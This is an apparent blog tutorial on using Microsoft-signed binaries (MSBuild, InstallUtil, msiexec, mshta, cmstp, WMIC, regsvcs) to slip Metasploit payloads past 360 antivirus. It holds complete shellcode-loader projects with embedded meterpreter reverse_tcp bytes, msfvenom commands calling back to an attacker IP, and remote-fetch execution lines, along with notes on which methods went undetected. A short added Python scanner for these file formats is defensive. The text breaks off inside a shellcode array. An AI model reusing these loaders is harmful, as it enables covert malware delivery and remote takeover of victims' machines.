RAT AV Evasion: Whitelisted Programs

Preface

"Whitelisted program" technique: the "white" is a file that sits on the antivirus vendor's whitelist and is therefore never flagged; the "black" is the malicious code.

Combining white + black into one trojan is how the evasion works: a trusted, signed binary carries or launches the payload, so the payload rides on the binary's reputation.

Using whitelisted programs this way originates with LOLBins (Living Off the Land Binaries): legitimate binaries already present on the system that an attacker can drive to do work beyond their intended function.

LOLBins definition

  1. It is a file shipped with the operating system, or downloaded from Microsoft; either way it carries a Microsoft signature.

  2. Because it is Microsoft-signed, it is generally trusted by default and passes many application-whitelisting controls.

  3. It has functionality useful to APT actors or red teams. For example, in 2019 TA505 combined LOLBins with a new backdoor in attacks on the financial sector.

LOLBins capabilities

  1. Code execution: arbitrary code execution, i.e. using the LOLBin to run other (unsigned) programs or scripts.

  2. Code compilation.

  3. File operations: download, upload, copy.

  4. Persistence: using an existing LOLBin to maintain access, e.g. by hiding data in AD and launching it at logon.

  5. UAC bypass.

  6. Dumping process memory.

  7. Surveillance (keylogging, network sniffing, and so on).

  8. Evading or tampering with logs.

  9. DLL injection / side-loading without needing to relocate the binary elsewhere on the file system.

MSBuild.exe

The nps_payload tool used in the tools post generates an .xml project file and has msbuild.exe load the payload from it: MSBuild compiles and runs the C# inside an inline task while it "builds" the project, so no separate executable ever touches disk.

Requirement: .NET Framework >= 4.0 (the inline CodeTaskFactory task appeared in 4.0).

Ways to load the file

  1. Local execution

    %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml

  2. Remote execution (project file on an attacker-controlled share, launched through wmiexec.py)

    wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

Method 1

Generate a PowerShell payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f psh -o shell.ps1

Append the following to the end of the .ps1 so the script never returns (otherwise the runspace, and the meterpreter thread with it, is torn down as soon as the script finishes):

for (;;){
 Start-Sleep 60
}

Base64-encode the script and paste the result into the cmd string in shell.xml:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  <!-- License: BSD 3-Clause -->
  <Target Name="npscsharp">
    <nps />
  </Target>
  <UsingTask
    TaskName="nps"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class nps : Task, ITask
{
    public override bool Execute()
    {
        // base64 of the generated shell.ps1 goes here (elided in the original post)
        string cmd = "JEFuRUl---base64_shellcode-----xsSW1wb3J0KCJrZXJuZWwzMi5k";
        PowerShell ps = PowerShell.Create();
        ps.AddScript(Base64Decode(cmd));
        Collection<PSObject> output = null;
        try
        {
            output = ps.Invoke();
        }
        catch(Exception e)
        {
            Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());
        }
        if (output != null)
        {
            foreach (PSObject rtnItem in output)
            {
                Console.WriteLine(rtnItem.ToString());
            }
        }
        return true;
    }
    public static string Base64Encode(string text) {
        return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
    }
    public static string Base64Decode(string encodedtext) {
        return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
    }
}
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Execution was a bit flaky, but shell.xml passes 360's static scan.

Method 2

Generate C# shellcode with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f csharp

Paste the byte array into shellcode.xml:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>

<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
public override bool Execute()
{
byte[] shellcode = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x31,0xff,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,
0xc0,0x57,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18,0x50,
0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1,
0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,
0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };

UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>

Meterpreter session established.

360 did not detect it, either statically or behaviorally.

Note that this project declares VirtualAlloc/CreateThread with UInt32 pointer arguments and embeds x86 shellcode, so it must be built with the 32-bit msbuild.exe under Framework\, as in the comment at the top of the file; the Framework64\ copy would run the task as a 64-bit process and the truncated pointers would crash it.

msiexec.exe

msiexec.exe is the executable of the Windows Installer engine: MSI packages rely on that engine to install applications, and msiexec interprets the package and installs the product. It will also fetch the package from a URL.

Usage

msiexec /q /i http://ip/shell.msi

In testing, MSI files generated by msf itself and by a few other tools all had mediocre evasion.

InstallUtil.exe

InstallUtil.exe runs the installer components of .NET assemblies (classes deriving from System.Configuration.Install.Installer), and with /U it calls their Uninstall methods instead of Main(). Because the assembly is loaded through reflection rather than started as its own process, the payload can live in Uninstall while Main() stays harmless.

CSC + InstallUtil shellcode execution

Generate C# shellcode with msfvenom, encoded a few times:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f csharp

InstallUtil-Shellcode.cs (replace the shellcode with your own):

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
(Or)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.
We believe the root issue here is:

The root issue here with Assembly.Load() is that at the point at which execute operations are detected
(CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.
Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection),
which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.

The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
Its not really an exploit, but just a creative way to launch an exe/assembly.
*/

//root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

public class Program
{
public static void Main()
{
Console.WriteLine("Hello From Main...I Don't Do Anything");
//Add any behaviour here to throw off sandbox execution/analysts :)

}

}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{

Shellcode.Exec();

}

}

public class Shellcode
{
public static void Exec()
{
// native function's compiled code
// generated with metasploit
byte[] shellcode = new byte[516] {
0xbb,0xb5,0x9f,0x2d,0x3f,0xda,0xd6,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,
0x7b,0x31,0x5d,0x13,0x03,0x5d,0x13,0x83,0xc5,0xb1,0x7d,0xd8,0xe2,0x78,0x3b,
0xf6,0x54,0x9d,0x5a,0x20,0x12,0x45,0x57,0x8d,0xf2,0x4c,0x26,0x46,0x34,0x19,
0x50,0x24,0xf1,0xa1,0x61,0x7d,0xeb,0x9e,0xd9,0xdd,0xdb,0x71,0x74,0x3a,0x15,
0x7d,0x07,0x5c,0x7e,0x27,0x3e,0x0e,0xa3,0xc4,0x73,0x6e,0xdf,0xac,0xbc,0x59,
0x24,0x5b,0xd6,0x27,0x73,0xab,0x68,0xfd,0x45,0xb3,0xb2,0xe3,0x87,0xde,0x08,
0x05,0xdc,0xbe,0xf5,0x0c,0xc0,0xca,0xe5,0x52,0x1a,0x9f,0x5b,0xb9,0x95,0x73,
0x06,0x8e,0x47,0x44,0xd4,0x2d,0xd1,0xaa,0x34,0x61,0x83,0xc1,0xec,0xd4,0xde,
0x96,0x42,0xed,0x83,0xc5,0xe0,0xf1,0x9d,0xf3,0x4f,0x38,0x7a,0x18,0xda,0x97,
0x81,0x1b,0xf8,0xdf,0xf0,0x2d,0x5f,0x22,0xaa,0x35,0x2c,0x04,0xda,0xe5,0x33,
0x0e,0x3e,0x23,0x8c,0x74,0xbd,0x09,0xc5,0xe4,0x9a,0x59,0x85,0x62,0x39,0x46,
0x4c,0x92,0x74,0xa1,0x75,0x3e,0x67,0xa6,0xe5,0xf6,0x66,0x4f,0x4d,0x61,0xa2,
0xd8,0x27,0xca,0xd6,0x08,0x5b,0x68,0x91,0x98,0x33,0xb8,0xfa,0x8d,0xd8,0x0d,
0xf9,0xef,0x50,0xca,0xf1,0xae,0x5a,0x82,0xba,0xec,0xca,0x17,0xb2,0x5e,0x01,
0xa6,0x8a,0x53,0xda,0x2a,0x4a,0x53,0x80,0xf5,0x2d,0x86,0x7c,0x02,0x71,0xa9,
0x7d,0x91,0x6e,0x75,0xc7,0x2a,0x48,0xfd,0x03,0xe8,0x96,0x51,0x0b,0xfc,0x94,
0xf7,0xab,0x6a,0x8f,0x23,0xc2,0xf5,0xc6,0xaf,0x1b,0x5d,0x82,0x94,0x51,0x44,
0xa8,0xa8,0xea,0x72,0xd1,0xea,0xd2,0xde,0xb6,0x35,0x6b,0xdf,0xa9,0xeb,0x65,
0x67,0xdf,0x64,0xf4,0xb2,0xeb,0xd4,0x32,0x65,0xe3,0x37,0x16,0xf8,0x8d,0x66,
0x9f,0xdf,0x59,0xa8,0xce,0xbb,0x19,0x5b,0x55,0x8a,0xa0,0xb4,0xc5,0x4c,0x77,
0xd9,0xca,0xf3,0x52,0x8a,0x9b,0x82,0x7b,0x19,0xf4,0x22,0xe8,0x04,0xba,0x8e,
0xdb,0xfb,0x21,0xcf,0x2d,0x1c,0xb9,0xed,0xff,0x83,0x76,0xa7,0x12,0x77,0xec,
0xbb,0x76,0x75,0xe9,0xec,0xd7,0xe1,0x68,0x2a,0x72,0x69,0xbb,0x6d,0xde,0x6f,
0xbf,0x9c,0x49,0x43,0xef,0x7e,0xf7,0xfd,0x42,0x55,0x40,0xa1,0x3e,0xa9,0x81,
0xce,0xf8,0xa3,0x21,0x35,0x85,0x4a,0x18,0x86,0xd0,0xa3,0x89,0x28,0x53,0xeb,
0xa0,0x54,0x79,0x54,0x6b,0xd8,0xd1,0xff,0xe8,0x09,0x70,0xb2,0x9e,0x4e,0xd3,
0x53,0x41,0xf3,0x90,0xd3,0x71,0xcb,0x70,0xa7,0x68,0x9c,0xd5,0x29,0xcb,0xcd,
0x7f,0xc3,0xd1,0xd3,0x98,0x3b,0xa6,0x16,0x3b,0xc9,0x08,0xdd,0x19,0x48,0xf7,
0xb8,0x2a,0x75,0x2a,0x9c,0x71,0x28,0x2d,0x53,0xfa,0xc3,0x55,0xa6,0x9b,0x22,
0xe1,0xd4,0x06,0xbd,0x44,0xfc,0x39,0x01,0xf0,0x09,0x09,0xbf,0xe0,0x60,0xa7,
0x2e,0xc1,0xf9,0x78,0x1f,0xfc,0xb2,0x3a,0xc5,0xe3,0x96,0xc1,0xf3,0x21,0x4c,
0xb0,0xb0,0x64,0x24,0x6e,0x42,0x94,0x9e,0x0b,0x67,0xb1,0x2d,0x7c,0x44,0xea,
0x0b,0x6a,0xad,0x35,0x67,0x23,0x12,0xcd,0xd8,0x5b,0x12,0xc5,0xf1,0xc7,0x15,
0x51,0x14,0x85,0x32,0xe7,0x96,0xc6,0x92,0xb4,0x5e,0x60,0x8d,0x5d,0x7b,0x6f,
0xb5,0x80,0x9e,0x9b,0x75,0x11 };



UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}

private static UInt32 MEM_COMMIT = 0x1000;

private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);

[DllImport("kernel32")]
private static extern IntPtr CreateThread(

UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId

);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);

[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(

IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(

string moduleName

);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(

IntPtr hModule,
string procName

);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(

string lpFileName

);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();


}

Compile InstallUtil-Shellcode.cs with csc.exe:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\test\shell.exe C:\test\InstallUtil-ShellCode.cs

Run shell.exe through InstallUtil.exe:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe

On execution, 360 Security Guard raised a behavior-detection warning; if allowed through, the msf session comes back.

360 Antivirus detects it in a static scan.

Mshta.exe

Runs .hta files; in the tools post the .hta approach already had mediocre evasion.

An .hta generated directly by msf and launched with mshta.exe still gets detected.

CACTUSTORCH

In CACTUSTORCH.hta, the binary variable selects the executable to inject into.

Generate 32-bit shellcode:

msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin

Base64-encode it:

cat payload.bin | base64 -w 0

Paste the encoded output into the code variable in CACTUSTORCH.hta.

Serve the file from Kali and run it on Win7:

mshta.exe http://192.168.221.128/CACTUSTORCH.hta

360 did not react, but msf never got a session; I tried calc and rundll32 as the injection target.

Copying the .hta to disk and running it locally was flagged immediately. Not a single mshta.exe approach evaded detection.

Rundll32.exe

Loads a DLL and calls one of its exported functions from the command line (the System32 copy loads 64-bit DLLs, the SysWOW64 copy 32-bit ones):

Rundll32.exe DLLname,Functionname

How well a rundll32.exe-loaded payload evades depends entirely on the evasion work done on the DLL itself, and it is usually behavior detection that decides.

Both msfvenom and msf's SMB Delivery module can generate a malicious DLL, but neither got past behavior detection when executed.

Regsvr32.exe

Regsvr32 is a command-line utility for registering and unregistering OLE controls, such as DLLs and ActiveX controls, in the Windows registry.

Payload loading works through an .sct scriptlet whose JScript runs the commands; in testing none of the variants got past behavior detection.

Cmstp.exe

Command-line program for installing Connection Manager service profiles. CMSTP.exe takes an installation information file (INF) as its argument and installs a service profile for remote-access connections; the INF's install section can register a DLL or run commands, which is the hook used here.

Running a local DLL

Generate the DLL with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f dll -o test.dll

cmstp.inf:

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\test\test.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Jasontt"
ShortSvcName="Jasontt"

Behavior-detection warning, and the DLL was deleted outright by 360 Antivirus.

Running a cmd command

cmstp.inf:

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
c:\windows\system32\calc.exe
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Jasontt"
ShortSvcName="Jasontt"

Swapping RegisterOCXSection for RunPreSetupCommandsSection makes cmstp run a command line directly instead of registering a DLL.

Behavior detection flags it as a "cmstp attack".

Downloading and parsing a remote INF

Also does not get past behavior detection.

FTP.exe

Provides basic FTP access; lines beginning with ! in an ftp script are passed to the shell:

echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

This does not trigger behavior detection, but the program it launches will still be caught by 360 unless it has its own evasion.

WMIC

WMIC is the command-line front end to WMI (Windows Management Instrumentation) and supports system administration from the command line and from batch scripts.

This one should look familiar; most attack/defense books cover it.

Loading a remote payload

Generate an .hta file first; the stylesheet below only launches it. payload.xsl:

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("http://192.168.221.128:8088/TyPHLB3I.hta");
]]>
</ms:script>
</stylesheet>

On execution, 360 warned of a "wmic malicious command execution attack".
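
The MSBuild projects above (shell.xml / shellcode.xml), the cmstp.inf profiles and this payload.xsl are all plain text, so a defender can triage them statically before they ever reach msbuild, cmstp or wmic. The scanner below is an added example written for this post, not code from the original article or from any of the tools it cites: it parses the three formats and reports the execution hook each one carries. The SAMPLE_* documents are constructed to mirror the page's files, and the FLAGGED_APIS and CMSTP_HOOKS lists are my own choices, not a vendor signature set.

```python
"""Static triage of the three carrier-file formats this page feeds to LOLBins:
an MSBuild project with an inline CodeTaskFactory task (shell.xml / shellcode.xml),
a cmstp .inf profile (RegisterOCXs / RunPreSetupCommands hooks) and a WMIC .xsl
stylesheet carrying an <ms:script> block.  Added example, not from the original post;
the SAMPLE_* documents are constructed to mirror the page's files."""
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"
# APIs an inline build task has no legitimate reason to touch (my own list, not a vendor signature set)
FLAGGED_APIS = ("DllImport", "VirtualAlloc", "CreateThread",
                "System.Management.Automation", "FromBase64String")
# Install-section keys that cmstp resolves to DLLs to register or command lines to run
CMSTP_HOOKS = ("RegisterOCXs", "UnRegisterOCXs", "RunPreSetupCommands", "RunPostSetupCommands")

def scan_msbuild(text):
    """Report every <UsingTask> whose code is compiled at build time, plus the flagged APIs it uses."""
    findings = []
    for task in ET.fromstring(text).iter(f"{{{MSBUILD_NS}}}UsingTask"):
        factory = task.get("TaskFactory", "")
        if factory not in ("CodeTaskFactory", "RoslynCodeTaskFactory"):
            continue
        code = task.find(f".//{{{MSBUILD_NS}}}Code")
        body = (code.text or "") if code is not None else ""
        apis = tuple(api for api in FLAGGED_APIS if api in body)
        findings.append(("inline-task", task.get("TaskName"), factory, apis))
    return findings

def parse_inf(text):
    """Minimal INF reader -> {section: [lines]}; sections may hold bare paths, so no key=value assumption."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

def scan_cmstp_inf(text):
    """Resolve the install section's hook keys to the DLLs / command lines cmstp would execute."""
    sections = parse_inf(text)
    install = sections.get("DefaultInstall_SingleUser", []) + sections.get("DefaultInstall", [])
    findings = []
    for entry in install:
        key, _, target = (part.strip() for part in entry.partition("="))
        if key in CMSTP_HOOKS:
            for item in sections.get(target, []):
                findings.append(("cmstp-hook", key, item))
    return findings

def scan_xsl(text):
    """Report <ms:script> blocks (msxsl scripting extension) and the COM objects they instantiate."""
    findings = []
    for script in ET.fromstring(text).iter(f"{{{MS_XSLT_NS}}}script"):
        objects = re.findall(r'ActiveXObject\("([^"]+)"\)', script.text or "")
        findings.append(("ms-script", script.get("language"), tuple(objects)))
    return findings

def triage(filename, text):
    """Dispatch on extension; an empty list means nothing was flagged."""
    name = filename.lower()
    if name.endswith((".xml", ".csproj", ".proj")):
        return scan_msbuild(text)
    if name.endswith(".inf"):
        return scan_cmstp_inf(text)
    if name.endswith((".xsl", ".xslt")):
        return scan_xsl(text)
    return []

# Constructed samples shaped like the page's shellcode.xml, cmstp.inf and payload.xsl
SAMPLE_MSBUILD = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello"><ClassExample /></Target>
<UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
 AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task><Code Type="Class" Language="cs"><![CDATA[
using System.Runtime.InteropServices;
public class ClassExample : Microsoft.Build.Utilities.Task {
  [DllImport("kernel32")] static extern uint VirtualAlloc(uint a, uint s, uint t, uint p);
  public override bool Execute() { return true; }
}
]]></Code></Task></UsingTask>
</Project>"""
SAMPLE_INF = r"""[version]
Signature=$chicago$
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
RunPreSetupCommands=RunPreSetupCommandsSection
[RegisterOCXSection]
C:\test\test.dll
[RunPreSetupCommandsSection]
c:\windows\system32\calc.exe
"""
SAMPLE_XSL = """<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 xmlns:user="placeholder" version="1.0">
<ms:script implements-prefix="user" language="JScript"><![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("http://192.168.221.128:8088/TyPHLB3I.hta");
]]></ms:script>
</stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("shell.xml", SAMPLE_MSBUILD), ("cmstp.inf", SAMPLE_INF), ("payload.xsl", SAMPLE_XSL)):
        print(name, triage(name, doc))
```

Point it at a mail-gateway quarantine or at files written to user-writable paths and it gives you a reason string per hook rather than a hash match, which is exactly what the static side of 360 is missing when it passes shell.xml.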

Regasm.exe / Regsvcs.exe

Dependencies: Microsoft .NET Framework v4.0.30319, Microsoft SDKs

Regsvcs and Regasm are Windows command-line utilities for registering .NET Component Object Model (COM) assemblies. Methods marked [ComRegisterFunction] / [ComUnregisterFunction] run during registration and unregistration, which is where the payload goes.

Generate C# shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f csharp

regsvcs.cs:

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = '<base64 key blob, elided here>'
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
//This calls the UnregisterClass Method
*/
namespace regsvcser
{

public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }

[ComRegisterFunction] //Runs when regsvcs/regasm registers the assembly
public static void RegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute");
Shellcode.Exec();
}

[ComUnregisterFunction] //Runs on /U, or when registration fails and is rolled back
public static void UnRegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute either.");
Shellcode.Exec();
}
}

public class Shellcode
{
public static void Exec()
{
// native function's compiled code
// generated with metasploit (windows/meterpreter/reverse_tcp; not calc.exe as the upstream comment said)
byte[] shellcode = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x89,0xe5,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
